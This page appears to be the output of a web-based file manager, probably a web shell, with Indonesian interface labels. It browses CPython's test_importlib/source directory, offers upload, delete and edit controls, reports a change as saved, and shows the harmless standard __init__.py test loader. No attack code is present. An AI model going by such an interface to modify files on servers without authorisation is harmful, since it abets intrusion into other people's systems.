PATH: //opt/alt/python311/lib64/python3.11/test/test_importlib/source
FILE_BARU
CREATE
FOLDER_BARU
MKDIR
UPLOAD_FILE
GO
[ .. KEMBALI ]
📄 __init__.py
↓
X
📄 __main__.py
↓
X
📁 __pycache__/
X
📄 test_case_sensitivity.py
↓
X
📄 test_file_loader.py
↓
X
📄 test_finder.py
↓
X
📄 test_path_hook.py
↓
X
📄 test_source_encoding.py
↓
X
SAVING...
BERHASIL DIUBAH!
EDITING: __init__.py
import os from test.support import load_package_tests def load_tests(*args): return load_package_tests(os.path.dirname(__file__), *args)
SIMPAN PERUBAHAN